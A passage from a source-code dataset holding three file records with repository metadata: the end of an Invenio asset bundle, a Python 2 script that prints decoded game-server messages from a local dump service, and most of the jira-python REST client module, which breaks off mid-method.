weight=0,
bower={
"almond": "latest"
}
)
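# A hypothetical additional bundle following the same pattern (name and file
# paths are placeholders, not part of Invenio):
#
#     mymodule_js = Bundle(
#         "js/mymodule.js",
#         output="mymodule.js",
#         filters="uglifyjs",
#         weight=50,
#     )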
|
gpl-2.0
| 4,890,553,612,865,183,000
| 23.65812
| 113
| 0.625303
| false
| 3.118919
| false
| false
| false
|
tsdfsetatata/xserver
|
Server/dump_srv/print_wanyaogu.py
|
1
|
3005
|
#!/usr/bin/python
# coding: UTF-8
import sys
from socket import *
import struct
import raid_pb2
import wanyaogu_pb2
import login_pb2
import cast_skill_pb2
import move_direct_pb2
import team_pb2
import datetime
import get_one_msg
import scene_transfer_pb2
import horse_pb2
WATCH_PLAYER = {8589935415}
HOST='127.0.0.1'
PORT=13697
PORT=get_one_msg.get_dumpsrv_port()
ADDR=(HOST, PORT)
client=socket(AF_INET, SOCK_STREAM)
client.connect(ADDR)
last_data = ""
player_list = {}
def get_buff_data(t1):
retdata = ""
for buffinfo in t1.buff_info:
tmp = "(%d) " % buffinfo.id
retdata = retdata + tmp
return retdata
while True:
ret, last_data, player_id, msg_id, pb_data = get_one_msg.get_one_msg(client, last_data)
if ret == -1:
break
if ret == 0:
continue
# data_len = data_len - 8 - 16
# msg_format = "=IHH" + str(data_len) + 'sQIHH'
# msg_len, msg_id, seq, pb_data, player_id, t1, t1, t1 = struct.unpack(msg_format, data)
# print "read msg:", msg_id
# if not player_id in WATCH_PLAYER:
# continue;
    # scene transfer 10112
if msg_id == 10112:
req = scene_transfer_pb2.scene_transfer_answer();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入场景[%s]" % (player_id, req.new_scene_id)
    # raid finished 10812
if msg_id == 10812:
req = raid_pb2.raid_finish_notify();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 副本结算[%s]" % (player_id, req.star)
    # wanyaoka (monster card) list 11401
if msg_id == 11401:
req = wanyaogu_pb2.list_wanyaoka_answer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖卡列表[%s]" % (player_id, req.wanyaoka_id)
    # wanyaogu stage start notification 11402
if msg_id == 11402:
req = wanyaogu_pb2.wanyaogu_start_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷开始[%lu]" % (player_id, req.start_time)
    # wanyaogu furnace idle (AFK) notification 11403
if msg_id == 11403:
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷火炉挂机" % (player_id)
    # enter game, time sync
if msg_id == 10007:
req = login_pb2.EnterGameAnswer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入游戏 %u %d [%u %s %s]" % (player_id, req.curTime, req.direct, req.sceneId, req.posX, req.posZ)
    # 11404 // wanyaoka obtained notification wanyaoka_get_notify
if msg_id == 11404:
req = wanyaogu_pb2.wanyaoka_get_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 获得万妖卡 %s" % (player_id, req.wanyaoka_id)
|
gpl-3.0
| 5,305,513,111,979,851,000
| 27.45
| 140
| 0.603515
| false
| 2.508818
| false
| false
| false
|
coddingtonbear/jira
|
jira/client.py
|
1
|
100626
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import print_function
"""
This module implements a friendly (well, friendlier) interface between the raw JSON
responses from JIRA and the Resource/dict abstractions provided by this library. Users
will construct a JIRA object as described below. Full API documentation can be found
at: https://jira-python.readthedocs.org/en/latest/
"""
from functools import wraps
import imghdr
import mimetypes
import copy
import os
import re
import string
import tempfile
import logging
import json
import warnings
import pprint
import sys
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from six import string_types, integer_types
# six.moves does not play well with pyinstaller, see https://github.com/pycontribs/jira/issues/38
# from six.moves import html_parser
if sys.version_info < (3, 0, 0):
import HTMLParser as html_parser
else:
import html.parser as html_parser
import requests
try:
from requests_toolbelt import MultipartEncoder
except:
pass
# JIRA specific resources
from jira.resources import Resource, Issue, Comment, Project, Attachment, Component, Dashboard, Filter, Votes, Watchers, \
Worklog, IssueLink, IssueLinkType, IssueType, Priority, Version, Role, Resolution, SecurityLevel, Status, User, \
CustomFieldOption, RemoteLink
# GreenHopper specific resources
from jira.resources import GreenHopperResource, Board, Sprint
from jira.resilientsession import ResilientSession
from jira import __version__
from jira.utils import threaded_requests, json_loads, JIRAError, CaseInsensitiveDict
try:
from random import SystemRandom
random = SystemRandom()
except ImportError:
import random
# warnings.simplefilter('default')
# encoding = sys.getdefaultencoding()
# if encoding != 'UTF8':
# warnings.warn("Python default encoding is '%s' instead of 'UTF8' which means that there is a big change of having problems. Possible workaround http://stackoverflow.com/a/17628350/99834" % encoding)
def translate_resource_args(func):
"""
Decorator that converts Issue and Project resources to their keys when used as arguments.
"""
@wraps(func)
def wrapper(*args, **kwargs):
arg_list = []
for arg in args:
if isinstance(arg, (Issue, Project)):
arg_list.append(arg.key)
else:
arg_list.append(arg)
result = func(*arg_list, **kwargs)
return result
return wrapper
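# Sketch with hypothetical names: with the decorator applied, resource objects
# can be passed where keys are expected, e.g.
#
#     issue = jira.issue('FOO-1')
#     jira.assign_issue(issue, 'someuser')  # `issue` is converted to its key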
class ResultList(list):
def __init__(self, iterable=None, _total=None):
if iterable is not None:
list.__init__(self, iterable)
else:
list.__init__(self)
self.total = _total if _total is not None else len(self)
class JIRA(object):
"""
User interface to JIRA.
Clients interact with JIRA by constructing an instance of this object and calling its methods. For addressable
resources in JIRA -- those with "self" links -- an appropriate subclass of :py:class:`Resource` will be returned
with customized ``update()`` and ``delete()`` methods, along with attribute access to fields. This means that calls
of the form ``issue.fields.summary`` will be resolved into the proper lookups to return the JSON value at that
mapping. Methods that do not return resources will return a dict constructed from the JSON response or a scalar
value; see each method's documentation for details on what that method returns.
"""
DEFAULT_OPTIONS = {
"server": "http://localhost:2990/jira",
"rest_path": "api",
"rest_api_version": "2",
"verify": True,
"resilient": True,
"async": False,
"client_cert": None,
"check_update": True,
"headers": {
'X-Atlassian-Token': 'no-check',
'Cache-Control': 'no-cache',
# 'Accept': 'application/json;charset=UTF-8', # default for REST
'Content-Type': 'application/json', # ;charset=UTF-8',
# 'Accept': 'application/json', # default for REST
#'Pragma': 'no-cache',
#'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT'
}
}
checked_version = False
JIRA_BASE_URL = '{server}/rest/api/{rest_api_version}/{path}'
AGILE_BASE_URL = '{server}/rest/greenhopper/1.0/{path}'
def __init__(self, server=None, options=None, basic_auth=None, oauth=None, validate=None, async=False,
logging=True, max_retries=3):
"""
Construct a JIRA client instance.
Without any arguments, this client will connect anonymously to the JIRA instance
started by the Atlassian Plugin SDK from one of the 'atlas-run', ``atlas-debug``,
or ``atlas-run-standalone`` commands. By default, this instance runs at
``http://localhost:2990/jira``. The ``options`` argument can be used to set the JIRA instance to use.
Authentication is handled with the ``basic_auth`` argument. If authentication is supplied (and is
accepted by JIRA), the client will remember it for subsequent requests.
For quick command line access to a server, see the ``jirashell`` script included with this distribution.
        The easiest way to instantiate is using j = JIRA("https://jira.atlassian.com")
:param options: Specify the server and properties this client will use. Use a dict with any
of the following properties:
* server -- the server address and context path to use. Defaults to ``http://localhost:2990/jira``.
* rest_path -- the root REST path to use. Defaults to ``api``, where the JIRA REST resources live.
* rest_api_version -- the version of the REST resources under rest_path to use. Defaults to ``2``.
* verify -- Verify SSL certs. Defaults to ``True``.
* client_cert -- a tuple of (cert,key) for the requests library for client side SSL
:param basic_auth: A tuple of username and password to use when establishing a session via HTTP BASIC
authentication.
:param oauth: A dict of properties for OAuth authentication. The following properties are required:
* access_token -- OAuth access token for the user
* access_token_secret -- OAuth access token secret to sign with the key
* consumer_key -- key of the OAuth application link defined in JIRA
* key_cert -- private key file to sign requests with (should be the pair of the public key supplied to
JIRA in the OAuth application link)
        :param validate: If true it will validate your credentials first. Remember that if you are accessing JIRA
            as anonymous it will fail to instantiate.
:param async: To enable async requests for those actions where we implemented it, like issue update() or delete().
Obviously this means that you cannot rely on the return code when this is enabled.
"""
if options is None:
options = {}
if server and hasattr(server, 'keys'):
warnings.warn(
"Old API usage, use JIRA(url) or JIRA(options={'server': url}, when using dictionary always use named parameters.",
DeprecationWarning)
options = server
server = None
if server:
options['server'] = server
if async:
options['async'] = async
self.logging = logging
self._options = copy.copy(JIRA.DEFAULT_OPTIONS)
self._options.update(options)
# Rip off trailing slash since all urls depend on that
if self._options['server'].endswith('/'):
self._options['server'] = self._options['server'][:-1]
self._try_magic()
if oauth:
self._create_oauth_session(oauth)
elif basic_auth:
self._create_http_basic_session(*basic_auth)
self._session.headers.update(self._options['headers'])
else:
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.headers.update(self._options['headers'])
self._session.max_retries = max_retries
if validate:
# This will raise an Exception if you are not allowed to login.
# It's better to fail faster than later.
self.session()
# We need version in order to know what API calls are available or not
si = self.server_info()
try:
self._version = tuple(si['versionNumbers'])
except Exception as e:
globals()['logging'].error("invalid server_info: %s", si)
raise e
if self._options['check_update'] and not JIRA.checked_version:
self._check_update_()
JIRA.checked_version = True
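    # Minimal construction sketches (placeholder URLs and credentials):
    #
    #     jira = JIRA('https://jira.example.com', basic_auth=('user', 'secret'))
    #     jira = JIRA(options={'server': 'https://jira.example.com', 'verify': False})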
def _check_update_(self):
# check if the current version of the library is outdated
try:
data = requests.get("http://pypi.python.org/pypi/jira/json", timeout=2.001).json()
released_version = data['info']['version']
if released_version > __version__:
warnings.warn("You are running an outdated version of JIRA Python %s. Current version is %s. Do not file any bugs against older versions." % (
__version__, released_version))
except requests.RequestException:
pass
except Exception as e:
logging.warning(e)
def __del__(self):
session = getattr(self, "_session", None)
if session is not None:
if sys.version_info < (3, 4, 0): # workaround for https://github.com/kennethreitz/requests/issues/2303
session.close()
def _check_for_html_error(self, content):
# TODO: Make it return errors when content is a webpage with errors
        # JIRA has the bad habit of returning errors in pages with 200 and
# embedding the error in a huge webpage.
if '<!-- SecurityTokenMissing -->' in content:
logging.warning("Got SecurityTokenMissing")
raise JIRAError("SecurityTokenMissing: %s" % content)
return False
return True
# Information about this client
def client_info(self):
"""Get the server this client is connected to."""
return self._options['server']
# Universal resource loading
def find(self, resource_format, ids=None):
"""
Get a Resource object for any addressable resource on the server.
This method is a universal resource locator for any RESTful resource in JIRA. The
argument ``resource_format`` is a string of the form ``resource``, ``resource/{0}``,
``resource/{0}/sub``, ``resource/{0}/sub/{1}``, etc. The format placeholders will be
populated from the ``ids`` argument if present. The existing authentication session
will be used.
The return value is an untyped Resource object, which will not support specialized
:py:meth:`.Resource.update` or :py:meth:`.Resource.delete` behavior. Moreover, it will
not know to return an issue Resource if the client uses the resource issue path. For this
reason, it is intended to support resources that are not included in the standard
Atlassian REST API.
:param resource_format: the subpath to the resource string
:param ids: values to substitute in the ``resource_format`` string
:type ids: tuple or None
"""
resource = Resource(resource_format, self._options, self._session)
resource.find(ids)
return resource
def async_do(self, size=10):
"""
This will execute all async jobs and wait for them to finish. By default it will run on 10 threads.
size: number of threads to run on.
:return:
"""
if hasattr(self._session, '_async_jobs'):
logging.info("Executing async %s jobs found in queue by using %s threads..." % (
len(self._session._async_jobs), size))
threaded_requests.map(self._session._async_jobs, size=size)
# Application properties
# non-resource
def application_properties(self, key=None):
"""
Return the mutable server application properties.
:param key: the single property to return a value for
"""
params = {}
if key is not None:
params['key'] = key
return self._get_json('application-properties', params=params)
def set_application_property(self, key, value):
"""
Set the application property.
:param key: key of the property to set
:param value: value to assign to the property
"""
url = self._options['server'] + \
'/rest/api/2/application-properties/' + key
payload = {
'id': key,
'value': value
}
r = self._session.put(
url, data=json.dumps(payload))
def applicationlinks(self, cached=True):
"""
List of application links
:return: json
"""
# if cached, return the last result
if cached and hasattr(self, '_applicationlinks'):
return self._applicationlinks
#url = self._options['server'] + '/rest/applinks/latest/applicationlink'
url = self._options['server'] + \
'/rest/applinks/latest/listApplicationlinks'
r = self._session.get(url)
o = json_loads(r)
if 'list' in o:
self._applicationlinks = o['list']
else:
self._applicationlinks = []
return self._applicationlinks
# Attachments
def attachment(self, id):
"""Get an attachment Resource from the server for the specified ID."""
return self._find_for_resource(Attachment, id)
# non-resource
def attachment_meta(self):
"""Get the attachment metadata."""
return self._get_json('attachment/meta')
@translate_resource_args
def add_attachment(self, issue, attachment, filename=None):
"""
Attach an attachment to an issue and returns a Resource for it.
The client will *not* attempt to open or validate the attachment; it expects a file-like object to be ready
for its use. The user is still responsible for tidying up (e.g., closing the file, killing the socket, etc.)
:param issue: the issue to attach the attachment to
:param attachment: file-like object to attach to the issue, also works if it is a string with the filename.
:param filename: optional name for the attached file. If omitted, the file object's ``name`` attribute
            is used. If you acquired the file-like object by any means other than ``open()``, make sure
that a name is specified in one way or the other.
:rtype: an Attachment Resource
"""
if isinstance(attachment, string_types):
attachment = open(attachment, "rb")
if hasattr(attachment, 'read') and hasattr(attachment, 'mode') and attachment.mode != 'rb':
logging.warning(
"%s was not opened in 'rb' mode, attaching file may fail." % attachment.name)
# TODO: Support attaching multiple files at once?
url = self._get_url('issue/' + str(issue) + '/attachments')
fname = filename
if not fname:
fname = os.path.basename(attachment.name)
if 'MultipartEncoder' not in globals():
method = 'old'
r = self._session.post(
url,
files={
'file': (fname, attachment, 'application/octet-stream')},
headers=CaseInsensitiveDict({'content-type': None, 'X-Atlassian-Token': 'nocheck'}))
else:
method = 'MultipartEncoder'
def file_stream():
return MultipartEncoder(
fields={
'file': (fname, attachment, 'text/plain')}
)
m = file_stream()
r = self._session.post(
url, data=m, headers=CaseInsensitiveDict({'content-type': m.content_type, 'X-Atlassian-Token': 'nocheck'}), retry_data=file_stream)
attachment = Attachment(self._options, self._session, json_loads(r)[0])
if attachment.size == 0:
raise JIRAError("Added empty attachment via %s method?!: r: %s\nattachment: %s" % (method, r, attachment))
return attachment
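    # Sketch with a hypothetical path and issue key: attach a local file.
    #
    #     with open('/tmp/report.pdf', 'rb') as fp:
    #         jira.add_attachment('FOO-1', fp, filename='report.pdf')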
# Components
def component(self, id):
"""
Get a component Resource from the server.
:param id: ID of the component to get
"""
return self._find_for_resource(Component, id)
@translate_resource_args
def create_component(self, name, project, description=None, leadUserName=None, assigneeType=None,
isAssigneeTypeValid=False):
"""
Create a component inside a project and return a Resource for it.
:param name: name of the component
:param project: key of the project to create the component in
:param description: a description of the component
:param leadUserName: the username of the user responsible for this component
:param assigneeType: see the ComponentBean.AssigneeType class for valid values
:param isAssigneeTypeValid: boolean specifying whether the assignee type is acceptable
"""
data = {
'name': name,
'project': project,
'isAssigneeTypeValid': isAssigneeTypeValid
}
if description is not None:
data['description'] = description
if leadUserName is not None:
data['leadUserName'] = leadUserName
if assigneeType is not None:
data['assigneeType'] = assigneeType
url = self._get_url('component')
r = self._session.post(
url, data=json.dumps(data))
component = Component(self._options, self._session, raw=json_loads(r))
return component
def component_count_related_issues(self, id):
"""
Get the count of related issues for a component.
:type id: integer
:param id: ID of the component to use
"""
return self._get_json('component/' + id + '/relatedIssueCounts')['issueCount']
# Custom field options
def custom_field_option(self, id):
"""
Get a custom field option Resource from the server.
:param id: ID of the custom field to use
"""
return self._find_for_resource(CustomFieldOption, id)
# Dashboards
def dashboards(self, filter=None, startAt=0, maxResults=20):
"""
Return a ResultList of Dashboard resources and a ``total`` count.
:param filter: either "favourite" or "my", the type of dashboards to return
:param startAt: index of the first dashboard to return
:param maxResults: maximum number of dashboards to return. The total number of
results is always available in the ``total`` attribute of the returned ResultList.
"""
params = {}
if filter is not None:
params['filter'] = filter
params['startAt'] = startAt
params['maxResults'] = maxResults
r_json = self._get_json('dashboard', params=params)
dashboards = [Dashboard(self._options, self._session, raw_dash_json)
for raw_dash_json in r_json['dashboards']]
return ResultList(dashboards, r_json['total'])
def dashboard(self, id):
"""
Get a dashboard Resource from the server.
:param id: ID of the dashboard to get.
"""
return self._find_for_resource(Dashboard, id)
# Fields
# non-resource
def fields(self):
"""Return a list of all issue fields."""
return self._get_json('field')
# Filters
def filter(self, id):
"""
Get a filter Resource from the server.
:param id: ID of the filter to get.
"""
return self._find_for_resource(Filter, id)
def favourite_filters(self):
"""Get a list of filter Resources which are the favourites of the currently authenticated user."""
r_json = self._get_json('filter/favourite')
filters = [Filter(self._options, self._session, raw_filter_json)
for raw_filter_json in r_json]
return filters
def create_filter(self, name=None, description=None,
jql=None, favourite=None):
"""
Create a new filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
data = {}
if name is not None:
data['name'] = name
if description is not None:
data['description'] = description
if jql is not None:
data['jql'] = jql
if favourite is not None:
data['favourite'] = favourite
url = self._get_url('filter')
r = self._session.post(
url, data=json.dumps(data))
raw_filter_json = json_loads(r)
return Filter(self._options, self._session, raw=raw_filter_json)
# Groups
# non-resource
def groups(self, query=None, exclude=None, maxResults=None):
"""
Return a list of groups matching the specified criteria.
Keyword arguments:
query -- filter groups by name with this string
exclude -- filter out groups by name with this string
maxResults -- maximum results to return. defaults to system property jira.ajax.autocomplete.limit (20)
"""
params = {}
if query is not None:
params['query'] = query
if exclude is not None:
params['exclude'] = exclude
if maxResults is not None:
params['maxResults'] = maxResults
return self._get_json('groups/picker', params=params)
def group_members(self, group):
"""
        Return a hash of users with their information. Requires JIRA 6.0; raises NotImplementedError on older versions.
"""
if self._version < (6, 0, 0):
raise NotImplementedError(
"Group members is not implemented in JIRA before version 6.0, upgrade the instance, if possible.")
params = {'groupname': group, 'expand': "users"}
r = self._get_json('group', params=params)
size = r['users']['size']
end_index = r['users']['end-index']
while end_index < size - 1:
params = {'groupname': group, 'expand': "users[%s:%s]" % (
end_index + 1, end_index + 50)}
r2 = self._get_json('group', params=params)
for user in r2['users']['items']:
r['users']['items'].append(user)
end_index = r2['users']['end-index']
size = r['users']['size']
result = {}
for user in r['users']['items']:
result[user['name']] = {'fullname': user['displayName'], 'email': user['emailAddress'],
'active': user['active']}
return result
def add_group(self, groupname):
'''
Creates a new group in JIRA.
:param groupname: The name of the group you wish to create.
        :return: Boolean - True if successful.
'''
url = self._options['server'] + '/rest/api/latest/group'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['name'] = groupname
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def remove_group(self, groupname):
'''
Deletes a group from the JIRA instance.
:param groupname: The group to be deleted from the JIRA instance.
:return: Boolean. Returns True on success.
'''
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
url = self._options['server'] + '/rest/api/latest/group'
x = {'groupname': groupname}
self._session.delete(url, params=x)
return True
# Issues
def issue(self, id, fields=None, expand=None):
"""
Get an issue Resource from the server.
:param id: ID or key of the issue to get
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# this allows us to pass Issue objects to issue()
if type(id) == Issue:
return id
issue = Issue(self._options, self._session)
params = {}
if fields is not None:
params['fields'] = fields
if expand is not None:
params['expand'] = expand
issue.find(id, params=params)
return issue
def create_issue(self, fields=None, prefetch=True, **fieldargs):
"""
Create a new issue and return an issue Resource for it.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored.
By default, the client will immediately reload the issue Resource created by this method in order to return
a complete Issue object to the caller; this behavior can be controlled through the 'prefetch' argument.
JIRA projects may contain many different issue types. Some issue screens have different requirements for
fields in a new issue. This information is available through the 'createmeta' method. Further examples are
available here: https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+Example+-+Create+Issue
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
:param prefetch: whether to reload the created issue Resource so that all of its data is present in the value\
returned from this method
"""
data = {}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
p = data['fields']['project']
if isinstance(p, string_types) or isinstance(p, integer_types):
data['fields']['project'] = {'id': self.project(p).id}
url = self._get_url('issue')
r = self._session.post(url, data=json.dumps(data))
raw_issue_json = json_loads(r)
if 'key' not in raw_issue_json:
raise JIRAError(r.status_code, request=r)
if prefetch:
return self.issue(raw_issue_json['key'])
else:
return Issue(self._options, self._session, raw=raw_issue_json)
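    # Sketch with a hypothetical project key and issue type:
    #
    #     new_issue = jira.create_issue(fields={
    #         'project': {'key': 'FOO'},
    #         'summary': 'Something is broken',
    #         'description': 'Steps to reproduce ...',
    #         'issuetype': {'name': 'Bug'},
    #     })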
def createmeta(self, projectKeys=None, projectIds=[], issuetypeIds=None, issuetypeNames=None, expand=None):
"""
Gets the metadata required to create issues, optionally filtered by projects and issue types.
:param projectKeys: keys of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectIds.
:param projectIds: IDs of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectKeys.
:param issuetypeIds: IDs of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeNames.
:param issuetypeNames: Names of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeIds.
:param expand: extra information to fetch inside each resource.
"""
params = {}
if projectKeys is not None:
params['projectKeys'] = projectKeys
if projectIds is not None:
if isinstance(projectIds, string_types):
projectIds = projectIds.split(',')
params['projectIds'] = projectIds
if issuetypeIds is not None:
params['issuetypeIds'] = issuetypeIds
if issuetypeNames is not None:
params['issuetypeNames'] = issuetypeNames
if expand is not None:
params['expand'] = expand
return self._get_json('issue/createmeta', params)
# non-resource
@translate_resource_args
def assign_issue(self, issue, assignee):
"""
Assign an issue to a user. None will set it to unassigned. -1 will set it to Automatic.
:param issue: the issue to assign
:param assignee: the user to assign the issue to
"""
url = self._options['server'] + \
'/rest/api/2/issue/' + str(issue) + '/assignee'
payload = {'name': assignee}
r = self._session.put(
url, data=json.dumps(payload))
@translate_resource_args
def comments(self, issue):
"""
Get a list of comment Resources.
:param issue: the issue to get comments from
"""
r_json = self._get_json('issue/' + str(issue) + '/comment')
comments = [Comment(self._options, self._session, raw_comment_json)
for raw_comment_json in r_json['comments']]
return comments
@translate_resource_args
def comment(self, issue, comment):
"""
Get a comment Resource from the server for the specified ID.
:param issue: ID or key of the issue to get the comment from
:param comment: ID of the comment to get
"""
return self._find_for_resource(Comment, (issue, comment))
@translate_resource_args
def add_comment(self, issue, body, visibility=None):
"""
Add a comment from the current authenticated user on the specified issue and return a Resource for it.
The issue identifier and comment body are required.
:param issue: ID or key of the issue to add the comment to
:param body: Text of the comment to add
:param visibility: a dict containing two entries: "type" and "value". "type" is 'role' (or 'group' if the JIRA\
server has configured comment visibility for groups) and 'value' is the name of the role (or group) to which\
viewing of this comment will be restricted.
"""
data = {
'body': body
}
if visibility is not None:
data['visibility'] = visibility
url = self._get_url('issue/' + str(issue) + '/comment')
r = self._session.post(
url, data=json.dumps(data))
comment = Comment(self._options, self._session, raw=json_loads(r))
return comment
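    # Sketch with a hypothetical issue key and role name:
    #
    #     jira.add_comment('FOO-1', 'Looks good to me.',
    #                      visibility={'type': 'role', 'value': 'Administrators'})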
# non-resource
@translate_resource_args
def editmeta(self, issue):
"""
Get the edit metadata for an issue.
:param issue: the issue to get metadata for
"""
return self._get_json('issue/' + str(issue) + '/editmeta')
@translate_resource_args
def remote_links(self, issue):
"""
Get a list of remote link Resources from an issue.
:param issue: the issue to get remote links from
"""
r_json = self._get_json('issue/' + str(issue) + '/remotelink')
remote_links = [RemoteLink(
self._options, self._session, raw_remotelink_json) for raw_remotelink_json in r_json]
return remote_links
@translate_resource_args
def remote_link(self, issue, id):
"""
Get a remote link Resource from the server.
:param issue: the issue holding the remote link
:param id: ID of the remote link
"""
return self._find_for_resource(RemoteLink, (issue, id))
# removed the @translate_resource_args because it prevents us from finding
# information for building a proper link
def add_remote_link(self, issue, destination, globalId=None, application=None, relationship=None):
"""
Add a remote link from an issue to an external application and returns a remote link Resource
for it. ``object`` should be a dict containing at least ``url`` to the linked external URL and
``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` and the keyword arguments ``globalId``, ``application``
and ``relationship``, see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param destination: the link details to add (see the above link for details)
:param globalId: unique ID for the link (see the above link for details)
:param application: application information for the link (see the above link for details)
:param relationship: relationship description for the link (see the above link for details)
"""
warnings.warn(
"broken: see https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551",
Warning)
data = {}
if type(destination) == Issue:
data['object'] = {
'title': str(destination),
'url': destination.permalink()
}
for x in self.applicationlinks():
if x['application']['displayUrl'] == destination._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
if 'globalId' not in data:
raise NotImplementedError(
"Unable to identify the issue to link to.")
else:
if globalId is not None:
data['globalId'] = globalId
if application is not None:
data['application'] = application
data['object'] = destination
if relationship is not None:
data['relationship'] = relationship
# check if the link comes from one of the configured application links
for x in self.applicationlinks():
if x['application']['displayUrl'] == self._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
remote_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return remote_link
# non-resource
@translate_resource_args
def transitions(self, issue, id=None, expand=None):
"""
Get a list of the transitions available on the specified issue to the current user.
:param issue: ID or key of the issue to get the transitions from
:param id: if present, get only the transition matching this ID
:param expand: extra information to fetch inside each transition
"""
params = {}
if id is not None:
params['transitionId'] = id
if expand is not None:
params['expand'] = expand
return self._get_json('issue/' + str(issue) + '/transitions', params=params)['transitions']
def find_transitionid_by_name(self, issue, transition_name):
"""
Get a transitionid available on the specified issue to the current user.
Look at https://developer.atlassian.com/static/rest/jira/6.1.html#d2e1074 for json reference
:param issue: ID or key of the issue to get the transitions from
        :param transition_name: name of the transition we are looking for
"""
        transitions_json = self.transitions(issue)
        id = None
        for transition in transitions_json["transitions"]:
if transition["name"].lower() == transition_name.lower():
id = transition["id"]
break
return id
@translate_resource_args
def transition_issue(self, issue, transition, fields=None, comment=None, **fieldargs):
# TODO: Support update verbs (same as issue.update())
"""
Perform a transition on an issue.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored. Field values will be set on the issue as part of the transition process.
:param issue: ID or key of the issue to perform the transition on
:param transition: ID or name of the transition to perform
:param comment: *Optional* String to add as comment to the issue when performing the transition.
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
"""
transitionId = None
try:
transitionId = int(transition)
except:
# cannot cast to int, so try to find transitionId by name
transitionId = self.find_transitionid_by_name(issue, transition)
if transitionId is None:
raise JIRAError("Invalid transition name. %s" % transition)
data = {
'transition': {
'id': transitionId
}
}
if comment:
data['update'] = {'comment': [{'add': {'body': comment}}]}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
url = self._get_url('issue/' + str(issue) + '/transitions')
r = self._session.post(
url, data=json.dumps(data))
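    # Sketch with a hypothetical transition name and field values:
    #
    #     jira.transition_issue('FOO-1', 'Resolve Issue',
    #                           fields={'resolution': {'name': 'Fixed'}},
    #                           comment='Fixed in release 1.2')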
@translate_resource_args
def votes(self, issue):
"""
Get a votes Resource from the server.
:param issue: ID or key of the issue to get the votes for
"""
return self._find_for_resource(Votes, issue)
@translate_resource_args
def add_vote(self, issue):
"""
Register a vote for the current authenticated user on an issue.
:param issue: ID or key of the issue to vote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
r = self._session.post(url)
@translate_resource_args
def remove_vote(self, issue):
"""
Remove the current authenticated user's vote from an issue.
:param issue: ID or key of the issue to unvote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
self._session.delete(url)
@translate_resource_args
def watchers(self, issue):
"""
Get a watchers Resource from the server for an issue.
:param issue: ID or key of the issue to get the watchers for
"""
return self._find_for_resource(Watchers, issue)
@translate_resource_args
def add_watcher(self, issue, watcher):
"""
Add a user to an issue's watchers list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to add to the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
self._session.post(
url, data=json.dumps(watcher))
@translate_resource_args
def remove_watcher(self, issue, watcher):
"""
Remove a user from an issue's watch list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to remove from the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
params = {'username': watcher}
result = self._session.delete(url, params=params)
return result
@translate_resource_args
def worklogs(self, issue):
"""
Get a list of worklog Resources from the server for an issue.
:param issue: ID or key of the issue to get worklogs from
"""
r_json = self._get_json('issue/' + str(issue) + '/worklog')
worklogs = [Worklog(self._options, self._session, raw_worklog_json)
for raw_worklog_json in r_json['worklogs']]
return worklogs
@translate_resource_args
def worklog(self, issue, id):
"""
Get a specific worklog Resource from the server.
:param issue: ID or key of the issue to get the worklog from
:param id: ID of the worklog to get
"""
return self._find_for_resource(Worklog, (issue, id))
@translate_resource_args
def add_worklog(self, issue, timeSpent=None, timeSpentSeconds=None, adjustEstimate=None,
newEstimate=None, reduceBy=None, comment=None, started=None, user=None):
"""
